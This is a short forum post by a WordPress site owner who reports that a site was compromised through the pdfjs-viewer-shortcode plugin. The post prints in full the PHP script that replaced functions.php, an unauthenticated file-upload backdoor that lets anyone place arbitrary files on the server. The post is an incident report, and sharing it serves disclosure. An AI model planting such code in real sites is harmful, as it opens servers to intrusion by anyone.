have been hacked

Hi,

I have been hacked today 2014-10-05 02:05:05
I received a mail from ovh.com who has blocked my site temporaly. The following exe wasn’t autorized : www/wp-content/plugins/pdfjs-viewer-shortcode/web/.nfs0000000001ca104a0000be1d
So i went on my FTP, I deleted the plugin entirely and relaunched the site.

Functions.php was entirely replaced by the following script:

<?php
if(isset($_POST['Submit'])){
    $filedir = "";
    $maxfile = '2000000';

    $userfile_name = $_FILES['image']['name'];
    $userfile_tmp = $_FILES['image']['tmp_name'];
    if (isset($_FILES['image']['name'])) {
        $abod = $filedir.$userfile_name;
        @move_uploaded_file($userfile_tmp, $abod);

echo"<center><b>Done ==> $userfile_name</b></center>";
}
}
else{
echo'
<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
}
?>

This script adds (on the top of any page of my site) the possibility to anyone to add some shits on my site.
The plugin is deleted, the script is deleted, I hope i’m safe now…

Bye

https://www.ads-software.com/plugins/pdfjs-viewer-shortcode/